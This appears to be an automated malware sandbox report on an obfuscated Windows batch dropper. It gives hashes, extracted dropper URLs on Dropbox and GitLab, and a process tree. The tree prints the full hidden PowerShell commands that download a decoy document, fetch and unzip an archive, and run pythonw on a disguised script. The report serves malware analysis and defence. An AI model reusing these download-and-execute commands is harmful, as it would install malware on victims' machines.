Overview

overview

10

Static

static

1

10f2af74b9...fb.bat

windows7-x64

10

10f2af74b9...fb.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 02:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat

  • Size

    32KB

  • MD5

    35dfb522fddada4616e915fb17888e31

  • SHA1

    8fbbfe83e8f5faa59037fbbf4fd97bc2c78f95e6

  • SHA256

    10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb

  • SHA512

    9e35fa005d0e1756bcf45b43db52c7be1ff584f8cdbf4349c06d6cabdff03acd1ea32c2e3cfc72cbd28b7d41853b2e7c44784b5d1e585b7fae2dc480e60305a5

  • SSDEEP

    384:UuGq+dSBNrJ0AKr6CLNOPKQdKJGE9v62FTJsN/6SdRfIeq2sOGLtY6:mq+dSBNdBKrhLNJL8E9rTJsNCSE3w96

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/20_Advertising_Campaign_and_Collaboration.docx?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
        PID:2492
      • C:\Windows\system32\find.exe
        find
        2⤵
          PID:2324
        • C:\Windows\system32\findstr.exe
          findstr /L /I set C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
          2⤵
            PID:2348
          • C:\Windows\system32\findstr.exe
            findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
            2⤵
              PID:1048
            • C:\Windows\system32\findstr.exe
              findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
              2⤵
                PID:2636
              • C:\Windows\system32\findstr.exe
                findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
                2⤵
                  PID:2440
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c type tmp
                  2⤵
                    PID:2640
                  • C:\Windows\system32\find.exe
                    fiNd
                    2⤵
                      PID:2076
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c type tmp
                      2⤵
                        PID:1424
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/20_Advertising_Campaign_and_Collaboration.docx?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1', 'C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx')"
                        2⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3032
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx'"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3048
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip', 'C:\Users\Public\Document.zip')"
                        2⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2728
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2836
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2764

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\tmp
                      Filesize

                      14B

                      MD5

                      ce585c6ba32ac17652d2345118536f9c

                      SHA1

                      be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                      SHA256

                      589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                      SHA512

                      d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                      Filesize

                      7KB

                      MD5

                      305050597d183a0f2df4a28082787761

                      SHA1

                      e1bc840d920ae57060180a3cc7171049ea7d5009

                      SHA256

                      130637b726637855e55a20d71f5fe3e629b288a930cd2e86e21b291ffdb11f0e

                      SHA512

                      816c967ee8d11cbc5dd116be0a6b08969a7eb468c50f99c74fa24660e17c67998cbc272253e20151359c271d62c003d4ab1d6bf9f0f79f2ee9c6905cf22b50ac

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                      Filesize

                      7KB

                      MD5

                      bc2c8b28964af2ea91fa7cff3a169dfc

                      SHA1

                      25b5f5db7428499930573d912ef7d6f3dde37d23

                      SHA256

                      6083b4a63251a15b04f4b9aa142034f89d914197381c1e5cce3f1d3f8ab8c638

                      SHA512

                      f3b90145e36d19d41855924504f9ad0c83538c7196970783e20c6dde3d1b1b475b12c520e6be19e38c93da9615574c6e5af54a77bb656b434b3d6525442620c7

                      Download Submit

                    • memory/3032-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/3032-9-0x000000001B650000-0x000000001B932000-memory.dmp

                      Filesize

                      2.9MB

                      Download

                    • memory/3032-10-0x0000000001E60000-0x0000000001E68000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/3032-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/3048-17-0x000000001B670000-0x000000001B952000-memory.dmp

                      Filesize

                      2.9MB

                      Download

                    • memory/3048-18-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                      Filesize

                      32KB

                      Download